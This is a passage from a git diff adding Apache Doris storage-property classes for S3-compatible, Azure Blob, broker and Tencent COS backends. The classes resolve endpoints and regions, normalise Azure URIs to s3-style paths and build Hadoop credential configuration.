      + * That said, we strongly recommend users to explicitly configure both + * {@code endpoint} and {@code region} to ensure predictable behavior + * across all storage backends. + * + * @throws IllegalArgumentException if the endpoint format is invalid + */ + protected void setEndpointIfPossible() { + if (StringUtils.isNotBlank(getEndpoint())) { + return; + } + // 1. try getting endpoint region + String endpoint = getEndpointFromRegion(); + if (StringUtils.isNotBlank(endpoint)) { + setEndpoint(endpoint); + return; + } + // 2. try getting endpoint from uri + try { + endpoint = S3PropertyUtils.constructEndpointFromUrl(origProps, getUsePathStyle(), + getForceParsingByStandardUrl()); + if (StringUtils.isNotBlank(endpoint)) { + setEndpoint(endpoint); + } + } catch (Exception e) { + if (LOG.isDebugEnabled()) { + LOG.debug("Failed to construct endpoint from url: {}", e.getMessage(), e); + } + } + } + + private void setRegionIfPossible() { + if (StringUtils.isNotBlank(getRegion())) { + return; + } + String endpoint = getEndpoint(); + if (endpoint == null || endpoint.isEmpty()) { + return; + } + Optional regionOptional = extractRegion(endpoint); + if (regionOptional.isPresent()) { + setRegion(regionOptional.get()); + } + } + + private Optional extractRegion(String endpoint) { + return extractRegion(endpointPatterns(), endpoint); + } + + public static Optional extractRegion(Set endpointPatterns, String endpoint) { + for (Pattern pattern : endpointPatterns) { + Matcher matcher = pattern.matcher(endpoint.toLowerCase()); + if (matcher.matches()) { + // Check all possible groups for region (group 1, 2, or 3) + for (int i = 1; i <= matcher.groupCount(); i++) { + String group = matcher.group(i); + if (StringUtils.isNotBlank(group)) { + return Optional.of(group); + } + } + } + } + return Optional.empty(); + } + + protected abstract Set endpointPatterns(); + + // This method should be overridden by subclasses to provide a default endpoint based on the region. + // Because for aws s3, only region is needed, the endpoint can be constructed from the region. + // But for other s3 compatible storage, the endpoint may need to be specified explicitly. + protected String getEndpointFromRegion() { + return ""; + } + + @Override + public String validateAndNormalizeUri(String uri) throws StoragePropertiesException { + return S3PropertyUtils.validateAndNormalizeUri(uri, getUsePathStyle(), getForceParsingByStandardUrl()); + + } + + @Override + public String validateAndGetUri(Map loadProps) throws StoragePropertiesException { + return S3PropertyUtils.validateAndGetUri(loadProps); + } + + @Override + public void initializeHadoopStorageConfig() { + hadoopConfigMap = new LinkedHashMap<>(); + // Compatibility note: Due to historical reasons, even when the underlying + // storage is OSS, OBS, etc., users may still configure the schema as "s3://". + // To ensure backward compatibility, we append S3-related properties by default. + appendS3HdfsProperties(hadoopConfigMap); + } + + private void appendS3HdfsProperties(Map hadoopConfigMap) { + hadoopConfigMap.put("fs.s3.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem"); + hadoopConfigMap.put("fs.s3a.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem"); + // endpoint/region emitted only when present (lenient; matches the connector port that omitted them when + // blank rather than asserting non-null). + if (StringUtils.isNotBlank(getEndpoint())) { + hadoopConfigMap.put("fs.s3a.endpoint", getEndpoint()); + } + if (StringUtils.isNotBlank(getRegion())) { + hadoopConfigMap.put("fs.s3a.endpoint.region", getRegion()); + } + hadoopConfigMap.put("fs.s3.impl.disable.cache", "true"); + hadoopConfigMap.put("fs.s3a.impl.disable.cache", "true"); + if (StringUtils.isNotBlank(getAccessKey())) { + hadoopConfigMap.put("fs.s3a.aws.credentials.provider", + "org.apache.hadoop.fs.s3a.SimpleAWSCredentialsProvider"); + hadoopConfigMap.put("fs.s3a.access.key", getAccessKey()); + hadoopConfigMap.put("fs.s3a.secret.key", getSecretKey()); + if (StringUtils.isNotBlank(getSessionToken())) { + hadoopConfigMap.put("fs.s3a.session.token", getSessionToken()); + } + } + hadoopConfigMap.put("fs.s3a.connection.maximum", getMaxConnections()); + hadoopConfigMap.put("fs.s3a.connection.request.timeout", getRequestTimeoutS()); + hadoopConfigMap.put("fs.s3a.connection.timeout", getConnectionTimeoutS()); + hadoopConfigMap.put("fs.s3a.path.style.access", getUsePathStyle()); + } + + /** + * Searches for a region value from the given properties map by scanning all known + * S3-compatible subclass region field annotations. + *

      + * This method iterates through all known subclasses of {@link AbstractS3CompatibleProperties}, + * finds fields annotated with {@code @ConnectorProperty(isRegionField = true)}, + * and checks if any of the annotation's {@code names} exist in the provided properties map. + * + * @param props the property map to search for region values + * @return the region value if found, or {@code null} if no region property is present + */ + public static String getRegionFromProperties(Map props) { + List> subClasses = Arrays.asList( + S3Properties.class, OSSProperties.class, COSProperties.class, + OBSProperties.class, MinioProperties.class); + for (Class clazz : subClasses) { + List fields = ConnectorPropertiesUtils.getConnectorProperties(clazz); + for (Field field : fields) { + ConnectorProperty annotation = field.getAnnotation(ConnectorProperty.class); + if (annotation != null && annotation.isRegionField()) { + for (String name : annotation.names()) { + String value = props.get(name); + if (StringUtils.isNotBlank(value)) { + return value; + } + } + } + } + } + return null; + } + + @Override + public String getStorageName() { + return "S3"; + } + + /** Returns the bucket name from the connector properties map. */ + public String getBucket() { + String bucket = origProps.get("s3.bucket"); + if (bucket == null) { + bucket = origProps.get("AWS_BUCKET"); + } + return bucket != null ? bucket : ""; + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/AzureProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/AzureProperties.java new file mode 100644 index 00000000000000..b1128a78e641ba --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/AzureProperties.java @@ -0,0 +1,334 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; +import org.apache.doris.foundation.property.ConnectorProperty; +import org.apache.doris.foundation.property.ParamRules; +import org.apache.doris.foundation.property.StoragePropertiesException; +import org.apache.doris.property.storage.exception.AzureAuthType; + +import com.google.common.base.Strings; +import com.google.common.collect.ImmutableSet; +import lombok.Getter; +import lombok.Setter; + +import java.util.HashMap; +import java.util.LinkedHashMap; +import java.util.LinkedHashSet; +import java.util.Locale; +import java.util.Map; +import java.util.Objects; +import java.util.Set; +import java.util.stream.Stream; + +/** + * AzureProperties is a specialized configuration class for accessing Azure Blob Storage + * using an S3-compatible interface. + * + *

      This class extends {@link StorageProperties} and adapts Azure-specific properties + * to a format that is compatible with the backend engine (BE), which expects configurations + * similar to Amazon S3. This is necessary because the backend is designed to work with + * S3-style parameters regardless of the actual cloud provider. + * + *

      Although Azure Blob Storage does not use all of the S3 parameters (e.g., region), + * this class maps and provides dummy or compatible values to satisfy the expected format. + * It also tags the provider as "azure" in the final configuration map. + * + *

      The class supports common parameters like access key, secret key, endpoint, and + * path style access, while also ensuring compatibility with existing S3 processing + * logic by delegating some functionality to {@code S3PropertyUtils}. + * + *

      Typical usage includes validation of required parameters, transformation to a + * backend-compatible configuration map, and conversion of URLs to storage paths. + * + *

      Note: This class may evolve as the backend introduces native Azure support + * or adopts a more flexible configuration model. + * + * @see StorageProperties + * @see S3PropertyUtils + */ +public class AzureProperties extends StorageProperties { + @Getter + @ConnectorProperty(names = {"azure.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}, + required = false, + description = "The endpoint of S3.") + protected String endpoint = ""; + + + @Getter + @ConnectorProperty(names = {"azure.account_name", "azure.access_key", "s3.access_key", + "AWS_ACCESS_KEY", "ACCESS_KEY", "access_key"}, + required = false, + sensitive = true, + description = "The access key of S3.") + protected String accountName = ""; + + @Getter + @ConnectorProperty(names = {"azure.account_key", "azure.secret_key", "s3.secret_key", + "AWS_SECRET_KEY", "secret_key"}, + sensitive = true, + required = false, + description = "The secret key of S3.") + protected String accountKey = ""; + + @ConnectorProperty(names = {"azure.oauth2_client_id"}, + required = false, + description = "The client id of Azure AD application.") + private String clientId; + + @ConnectorProperty(names = {"azure.oauth2_client_secret"}, + required = false, + sensitive = true, + description = "The client secret of Azure AD application.") + private String clientSecret; + + + @ConnectorProperty(names = {"azure.oauth2_server_uri"}, + required = false, + description = "The account host of Azure blob.") + private String oauthServerUri; + + @ConnectorProperty(names = {"azure.oauth2_account_host"}, + required = false, + description = "The account host of Azure blob.") + private String accountHost; + + @ConnectorProperty(names = {"azure.auth_type"}, + required = false, + description = "The auth type of Azure blob.") + private String azureAuthType = AzureAuthType.SharedKey.name(); + + @Getter + @ConnectorProperty(names = {"container", "azure.bucket", "s3.bucket"}, + required = false, + description = "The container of Azure blob.") + protected String container = ""; + + /** + * Flag indicating whether to use path-style URLs for the object storage system. + * This value is optional and can be configured by the user. + */ + @Setter + @Getter + @ConnectorProperty(names = {"use_path_style", "s3.path-style-access"}, required = false, + description = "Whether to use path style URL for the storage.") + protected String usePathStyle = "false"; + @ConnectorProperty(names = {"force_parsing_by_standard_uri"}, required = false, + description = "Whether to use path style URL for the storage.") + @Getter + protected String forceParsingByStandardUrl = "false"; + + public AzureProperties(Map origProps) { + super(Type.AZURE, origProps); + } + + public static AzureProperties of(Map properties) { + AzureProperties propertiesObj = new AzureProperties(properties); + ConnectorPropertiesUtils.bindConnectorProperties(propertiesObj, properties); + propertiesObj.initNormalizeAndCheckProps(); + return propertiesObj; + } + + @Override + public void initNormalizeAndCheckProps() { + super.initNormalizeAndCheckProps(); + //check endpoint + this.endpoint = formatAzureEndpoint(endpoint, accountName); + buildRules().validate(); + if (AzureAuthType.OAuth2.name().equals(azureAuthType) && (!isIcebergRestCatalog())) { + throw new UnsupportedOperationException("OAuth2 auth type is only supported for iceberg rest catalog"); + } + } + + public static boolean guessIsMe(Map origProps) { + boolean enable = origProps.containsKey(FS_PROVIDER_KEY) + && origProps.get(FS_PROVIDER_KEY).equalsIgnoreCase("azure"); + if (enable) { + return true; + } + String value = Stream.of("azure.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT") + .map(origProps::get) + .filter(Objects::nonNull) + .findFirst() + .orElse(null); + if (!Strings.isNullOrEmpty(value)) { + return AzurePropertyUtils.isAzureBlobEndpoint(value); + } + return false; + } + + @Override + public Map getBackendConfigProperties() { + if (!azureAuthType.equalsIgnoreCase("OAuth2")) { + Map s3Props = new HashMap<>(); + s3Props.put("AWS_ENDPOINT", endpoint); + s3Props.put("AWS_REGION", "dummy_region"); + s3Props.put("AWS_ACCESS_KEY", accountName); + s3Props.put("AWS_SECRET_KEY", accountKey); + s3Props.put("AWS_NEED_OVERRIDE_ENDPOINT", "true"); + s3Props.put("provider", "azure"); + s3Props.put("use_path_style", usePathStyle); + return s3Props; + } + // oauth2 use hadoop config + Map s3Props = new HashMap<>(); + hadoopConfigMap.forEach(s3Props::put); + return s3Props; + } + + /** + * Azure blob/dfs host suffixes used to derive per-endpoint {@code fs.azure.account.key.*} keys, inlined from the + * legacy fe-core {@code Config.azure_blob_host_suffixes} default. fe-property has no fe-core {@code Config}; the + * engine may overwrite this at startup to mirror a user-customized value. + */ + public static volatile String[] azureBlobHostSuffixes = { + ".blob.core.windows.net", + ".dfs.core.windows.net", + ".blob.core.chinacloudapi.cn", + ".dfs.core.chinacloudapi.cn", + ".blob.core.usgovcloudapi.net", + ".dfs.core.usgovcloudapi.net", + ".blob.core.cloudapi.de", + ".dfs.core.cloudapi.de" + }; + + public static final String AZURE_ENDPOINT_TEMPLATE = "https://%s.blob.core.windows.net"; + + public static String formatAzureEndpoint(String endpoint, String accountName) { + if (Strings.isNullOrEmpty(endpoint)) { + if (Strings.isNullOrEmpty(accountName)) { + return ""; + } + return String.format(AZURE_ENDPOINT_TEMPLATE, accountName); + } + if (endpoint.contains("://")) { + return endpoint; + } + return "https://" + endpoint; + } + + @Override + public String validateAndNormalizeUri(String url) throws StoragePropertiesException { + return AzurePropertyUtils.validateAndNormalizeUri(url); + + } + + @Override + public String validateAndGetUri(Map loadProps) throws StoragePropertiesException { + return AzurePropertyUtils.validateAndGetUri(loadProps); + } + + @Override + public String getStorageName() { + return "AZURE"; + } + + @Override + public void initializeHadoopStorageConfig() { + hadoopConfigMap = new LinkedHashMap<>(); + //disable azure cache + // Disable all Azure ABFS/WASB FileSystem caching to ensure fresh instances per configuration + for (String scheme : new String[]{"abfs", "abfss", "wasb", "wasbs"}) { + hadoopConfigMap.put("fs." + scheme + ".impl.disable.cache", "true"); + } + origProps.forEach((k, v) -> { + if (k.startsWith("fs.azure.")) { + hadoopConfigMap.put(k, v); + } + }); + if (azureAuthType != null && azureAuthType.equalsIgnoreCase("OAuth2")) { + setHDFSAzureOauth2Config(hadoopConfigMap); + } else { + setHDFSAzureAccountKeys(hadoopConfigMap, accountName, accountKey); + } + } + + @Override + protected Set schemas() { + return ImmutableSet.of("wasb", "wasbs", "abfs", "abfss"); + } + + private static void setHDFSAzureAccountKeys(Map conf, String accountName, String accountKey) { + Set endpoints = new LinkedHashSet<>(); + if (azureBlobHostSuffixes != null) { + for (String endpointSuffix : azureBlobHostSuffixes) { + if (Strings.isNullOrEmpty(endpointSuffix)) { + continue; + } + String normalizedEndpoint = endpointSuffix.trim().toLowerCase(Locale.ROOT); + if (normalizedEndpoint.startsWith(".")) { + normalizedEndpoint = normalizedEndpoint.substring(1); + } + if (!normalizedEndpoint.isEmpty()) { + endpoints.add(normalizedEndpoint); + } + } + } + for (String endpoint : endpoints) { + String accountKeyConfig = String.format("fs.azure.account.key.%s.%s", accountName, endpoint); + conf.put(accountKeyConfig, accountKey); + } + conf.put("fs.azure.account.key", accountKey); + } + + private void setHDFSAzureOauth2Config(Map conf) { + conf.put(String.format("fs.azure.account.auth.type.%s", accountHost), "OAuth"); + conf.put(String.format("fs.azure.account.oauth.provider.type.%s", accountHost), + "org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider"); + conf.put(String.format("fs.azure.account.oauth2.client.id.%s", accountHost), clientId); + conf.put(String.format("fs.azure.account.oauth2.client.secret.%s", accountHost), clientSecret); + conf.put(String.format("fs.azure.account.oauth2.client.endpoint.%s", accountHost), oauthServerUri); + } + + private ParamRules buildRules() { + return new ParamRules() + // OAuth2 requires either credential or token, but not both + .requireIf(azureAuthType, AzureAuthType.OAuth2.name(), new String[]{accountHost, + clientId, + clientSecret, + oauthServerUri}, "When auth_type is OAuth2, oauth2_account_host, oauth2_client_id" + + ", oauth2_client_secret, and oauth2_server_uri are required.") + .requireIf(azureAuthType, AzureAuthType.SharedKey.name(), new String[]{accountName, accountKey}, + "When auth_type is SharedKey, account_name and account_key are required."); + } + + // NB:Temporary check: + // Temporary check: Currently using OAuth2 for accessing Onalake storage via HDFS. + // In the future, OAuth2 will be supported via native SDK to reduce maintenance. + // For now, OAuth2 authentication is only allowed for Iceberg REST. + // TODO: Remove this temporary check later + private static final String ICEBERG_CATALOG_TYPE_KEY = "iceberg.catalog.type"; + private static final String ICEBERG_CATALOG_TYPE_REST = "rest"; + private static final String TYPE_KEY = "type"; + private static final String ICEBERG_VALUE = "iceberg"; + + private boolean isIcebergRestCatalog() { + // check iceberg type + boolean hasIcebergType = origProps.entrySet().stream() + .anyMatch(entry -> TYPE_KEY.equalsIgnoreCase(entry.getKey()) + && ICEBERG_VALUE.equalsIgnoreCase(entry.getValue())); + if (!hasIcebergType && origProps.keySet().stream().anyMatch(TYPE_KEY::equalsIgnoreCase)) { + return false; + } + return origProps.entrySet().stream() + .anyMatch(entry -> ICEBERG_CATALOG_TYPE_KEY.equalsIgnoreCase(entry.getKey()) + && ICEBERG_CATALOG_TYPE_REST.equalsIgnoreCase(entry.getValue())); + } + +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/AzurePropertyUtils.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/AzurePropertyUtils.java new file mode 100644 index 00000000000000..cfd1b3bff3d574 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/AzurePropertyUtils.java @@ -0,0 +1,244 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.StoragePropertiesException; + +import org.apache.commons.lang3.StringUtils; + +import java.net.URI; +import java.net.URISyntaxException; +import java.util.Locale; +import java.util.Map; +import java.util.regex.Pattern; + +public class AzurePropertyUtils { + /** + * Validates and normalizes an Azure Blob Storage URI into a unified {@code s3://}-style format. + *

      + * This method supports the following URI formats: + *

        + *
      • HDFS-style Azure URIs: {@code wasb://}, {@code wasbs://}, {@code abfs://}, {@code abfss://}
      • + *
      • HTTPS-style Azure Blob URLs: {@code https://.blob.core.windows.net//}
      • + *
      + *

      + * The normalized output will always be in the form of: + *

      {@code
      +     * s3:///
      +     * }
      + *

      + * Examples: + *

        + *
      • {@code wasbs://container@account.blob.core.windows.net/data/file.txt} + * → {@code s3://container/data/file.txt}
      • + *
      • {@code https://account.blob.core.windows.net/container/file.csv} + * → {@code s3://container/file.csv}
      • + *
      + * + * @param path the input Azure URI string to be validated and normalized + * @return a normalized {@code s3://}-style URI + * @throws StoragePropertiesException if the URI is blank, invalid, or unsupported + */ + public static String validateAndNormalizeUri(String path) throws StoragePropertiesException { + + if (StringUtils.isBlank(path)) { + throw new StoragePropertiesException("Path cannot be null or empty"); + } + // Only accept Azure Blob Storage-related URI schemes + if (!(path.startsWith("wasb://") || path.startsWith("wasbs://") + || path.startsWith("abfs://") || path.startsWith("abfss://") + || path.startsWith("https://") || path.startsWith("http://") + || path.startsWith("s3://"))) { + throw new StoragePropertiesException("Unsupported Azure URI scheme: " + path); + } + if (isOneLakeLocation(path)) { + return path; + } + return convertToS3Style(path); + } + + private static final Pattern ONELAKE_PATTERN = Pattern.compile( + "abfs[s]?://([^@]+)@([^/]+)\\.dfs\\.fabric\\.microsoft\\.com(/.*)?", Pattern.CASE_INSENSITIVE); + + public static boolean isAzureBlobEndpoint(String endpointOrHost) { + String host = extractHost(endpointOrHost); + if (StringUtils.isBlank(host)) { + return false; + } + String normalizedHost = host.toLowerCase(Locale.ROOT); + return matchesAnySuffix(normalizedHost, AzureProperties.azureBlobHostSuffixes); + } + + private static boolean matchesAnySuffix(String normalizedHost, String[] suffixes) { + if (suffixes == null || suffixes.length == 0) { + return false; + } + for (String suffix : suffixes) { + if (matchesSuffix(normalizedHost, suffix)) { + return true; + } + } + return false; + } + + private static boolean matchesSuffix(String normalizedHost, String suffix) { + if (StringUtils.isBlank(suffix)) { + return false; + } + String normalizedSuffix = suffix.trim().toLowerCase(Locale.ROOT); + if (!normalizedSuffix.startsWith(".")) { + normalizedSuffix = "." + normalizedSuffix; + } + return normalizedHost.endsWith(normalizedSuffix); + } + + private static String extractHost(String endpointOrHost) { + if (StringUtils.isBlank(endpointOrHost)) { + return null; + } + String normalized = endpointOrHost.trim(); + if (normalized.contains("://")) { + try { + return new URI(normalized).getHost(); + } catch (URISyntaxException e) { + return null; + } + } + int slashIndex = normalized.indexOf('/'); + if (slashIndex >= 0) { + normalized = normalized.substring(0, slashIndex); + } + int colonIndex = normalized.indexOf(':'); + if (colonIndex >= 0) { + normalized = normalized.substring(0, colonIndex); + } + return normalized; + } + + + /** + * Converts an Azure Blob Storage URI into a unified {@code s3:///} format. + *

      + * This method recognizes both: + *

        + *
      • HDFS-style Azure URIs ({@code wasb://}, {@code wasbs://}, {@code abfs://}, {@code abfss://})
      • + *
      • HTTPS-style Azure Blob URLs ({@code https://.blob.core.windows.net/...})
      • + *
      + *

      + * It throws an exception if the URI is invalid or does not match Azure Blob Storage patterns. + * + * @param uri the original Azure URI string + * @return the normalized {@code s3:///} string + * @throws StoragePropertiesException if the URI is invalid or unsupported + */ + private static String convertToS3Style(String uri) { + if (StringUtils.isBlank(uri)) { + throw new StoragePropertiesException("URI is blank"); + } + if (uri.startsWith("s3://")) { + return uri; + } + // Handle Azure HDFS-style URIs (wasb://, wasbs://, abfs://, abfss://) + if (uri.startsWith("wasb://") || uri.startsWith("wasbs://") + || uri.startsWith("abfs://") || uri.startsWith("abfss://")) { + + // Example: wasbs://container@account.blob.core.windows.net/path/file.txt + String schemeRemoved = uri.replaceFirst("^[a-z]+s?://", ""); + int atIndex = schemeRemoved.indexOf('@'); + if (atIndex < 0) { + throw new StoragePropertiesException("Invalid Azure URI, missing '@': " + uri); + } + + // Extract container name (before '@') + String container = schemeRemoved.substring(0, atIndex); + + // Extract remaining part after '@' + String remainder = schemeRemoved.substring(atIndex + 1); + int slashIndex = remainder.indexOf('/'); + + // Extract the path part if it exists + String path = (slashIndex != -1) ? remainder.substring(slashIndex + 1) : ""; + + // Normalize to s3-style URI: s3:/// + return StringUtils.isBlank(path) + ? String.format("s3://%s", container) + : String.format("s3://%s/%s", container, path); + } + + // ② Handle HTTPS/HTTP Azure Blob Storage URLs + if (uri.startsWith("https://") || uri.startsWith("http://")) { + try { + URI parsed = new URI(uri); + String host = parsed.getHost(); + String path = parsed.getPath(); + + if (StringUtils.isBlank(host)) { + throw new StoragePropertiesException("Invalid Azure HTTPS URI, missing host: " + uri); + } + + // Path usually looks like: // + String[] parts = path.split("/", 3); + if (parts.length < 2) { + throw new StoragePropertiesException("Invalid Azure Blob URL, missing container: " + uri); + } + + String container = parts[1]; + String remainder = (parts.length == 3) ? parts[2] : ""; + + // Convert HTTPS URL to s3-style format + return StringUtils.isBlank(remainder) + ? String.format("s3://%s", container) + : String.format("s3://%s/%s", container, remainder); + + } catch (URISyntaxException e) { + throw new StoragePropertiesException("Invalid HTTPS URI: " + uri, e); + } + } + + throw new StoragePropertiesException("Unsupported Azure URI scheme: " + uri); + } + + /** + * Extracts and validates the "uri" entry from a properties map. + * + *

      Example: + *

      +     * Input : {"uri": "wasb://container@account.blob.core.windows.net/dir/file.txt"}
      +     * Output: "wasb://container@account.blob.core.windows.net/dir/file.txt"
      +     * 
      + * + * @param props the configuration map expected to contain a "uri" key + * @return the URI string from the map + * @throws StoragePropertiesException if the map is empty or missing the "uri" key + */ + public static String validateAndGetUri(Map props) { + if (props == null || props.isEmpty()) { + throw new StoragePropertiesException("Properties map cannot be null or empty"); + } + + return props.entrySet().stream() + .filter(e -> StorageProperties.URI_KEY.equalsIgnoreCase(e.getKey())) + .map(Map.Entry::getValue) + .findFirst() + .orElseThrow(() -> new StoragePropertiesException("Properties must contain 'uri' key")); + } + + public static boolean isOneLakeLocation(String location) { + return ONELAKE_PATTERN.matcher(location).matches(); + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/BrokerProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/BrokerProperties.java new file mode 100644 index 00000000000000..f6ebdc20ea6fe0 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/BrokerProperties.java @@ -0,0 +1,114 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.ConnectorProperty; +import org.apache.doris.foundation.property.StoragePropertiesException; + +import com.google.common.collect.ImmutableSet; +import com.google.common.collect.Maps; +import lombok.Getter; +import lombok.Setter; + +import java.util.HashMap; +import java.util.Map; +import java.util.Set; + +public class BrokerProperties extends StorageProperties { + + public static final String BROKER_PREFIX = "broker."; + + @Setter + @Getter + @ConnectorProperty(names = {"broker.name"}, + required = false, + description = "The name of the broker. " + + "This is used to identify the broker in the system.") + private String brokerName = ""; + + @Getter + private Map brokerParams; + + public BrokerProperties(Map origProps) { + super(Type.BROKER, origProps); + } + + public static BrokerProperties of(String brokerName, Map origProps) { + BrokerProperties properties = new BrokerProperties(origProps); + properties.setBrokerName(brokerName); + properties.initNormalizeAndCheckProps(); + return properties; + } + + private static final String BIND_BROKER_NAME_KEY = "broker.name"; + + public static boolean guessIsMe(Map props) { + if (props == null || props.isEmpty()) { + return false; + } + return props.keySet().stream() + .anyMatch(key -> key.equalsIgnoreCase(BIND_BROKER_NAME_KEY)); + } + + @Override + public void initNormalizeAndCheckProps() { + super.initNormalizeAndCheckProps(); + this.brokerParams = Maps.newHashMap(extractBrokerProperties()); + } + + @Override + public Map getBackendConfigProperties() { + return origProps; + } + + @Override + public String validateAndNormalizeUri(String url) throws StoragePropertiesException { + return url; + } + + @Override + public String validateAndGetUri(Map loadProps) throws StoragePropertiesException { + return loadProps.get("uri"); + } + + @Override + public String getStorageName() { + return "BROKER"; + } + + @Override + public void initializeHadoopStorageConfig() { + // do nothing + } + + @Override + protected Set schemas() { + //not used + return ImmutableSet.of(); + } + + private Map extractBrokerProperties() { + Map brokerProperties = new HashMap<>(); + for (String key : origProps.keySet()) { + if (key.startsWith(BROKER_PREFIX)) { + brokerProperties.put(key.substring(BROKER_PREFIX.length()), origProps.get(key)); + } + } + return brokerProperties; + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/COSProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/COSProperties.java new file mode 100644 index 00000000000000..b914f28c949151 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/COSProperties.java @@ -0,0 +1,172 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; +import org.apache.doris.foundation.property.ConnectorProperty; + +import com.google.common.base.Strings; +import com.google.common.collect.ImmutableSet; +import lombok.Getter; +import lombok.Setter; + +import java.util.Map; +import java.util.Objects; +import java.util.Optional; +import java.util.Set; +import java.util.regex.Pattern; +import java.util.stream.Stream; + +public class COSProperties extends AbstractS3CompatibleProperties { + + @Setter + @Getter + @ConnectorProperty(names = {"cos.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}, + required = false, + description = "The endpoint of COS.") + protected String endpoint = ""; + + @Getter + @Setter + @ConnectorProperty(names = {"cos.region", "s3.region", "AWS_REGION", "region", "REGION"}, + required = false, + isRegionField = true, + description = "The region of COS.") + protected String region = ""; + + @Getter + @ConnectorProperty(names = {"cos.access_key", "s3.access_key", "s3.access-key-id", "AWS_ACCESS_KEY", "access_key", + "ACCESS_KEY"}, + required = false, + sensitive = true, + description = "The access key of COS.") + protected String accessKey = ""; + + @Getter + @ConnectorProperty(names = {"cos.secret_key", "s3.secret_key", "s3.secret-access-key", "AWS_SECRET_KEY", + "secret_key", "SECRET_KEY"}, + required = false, + sensitive = true, + description = "The secret key of COS.") + protected String secretKey = ""; + + @Getter + @ConnectorProperty(names = {"cos.session_token", "s3.session_token", "s3.session-token", "session_token"}, + required = false, + description = "The session token of COS.") + protected String sessionToken = ""; + + /** + * The maximum number of concurrent connections that can be made to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"cos.connection.maximum", "s3.connection.maximum"}, required = false, + description = "Maximum number of connections.") + protected String maxConnections = "100"; + + /** + * The timeout (in milliseconds) for requests made to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"cos.connection.request.timeout", "s3.connection.request.timeout"}, required = false, + description = "Request timeout in seconds.") + protected String requestTimeoutS = "10000"; + + /** + * The timeout (in milliseconds) for establishing a connection to the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"cos.connection.timeout", "s3.connection.timeout"}, required = false, + description = "Connection timeout in seconds.") + protected String connectionTimeoutS = "10000"; + + /** + * Flag indicating whether to use path-style URLs for the object storage system. + * This value is optional and can be configured by the user. + */ + @Getter + @ConnectorProperty(names = {"cos.use_path_style", "use_path_style", "s3.path-style-access"}, required = false, + description = "Whether to use path style URL for the storage.") + protected String usePathStyle = "false"; + + @ConnectorProperty(names = {"cos.force_parsing_by_standard_uri", "force_parsing_by_standard_uri"}, required = false, + description = "Whether to use path style URL for the storage.") + @Getter + protected String forceParsingByStandardUrl = "false"; + + /** + * Pattern to extract the region from a Tencent Cloud COS endpoint. + *

      + * Supported formats: + * - cos.ap-guangzhou.myqcloud.com => region = ap-guangzhou*

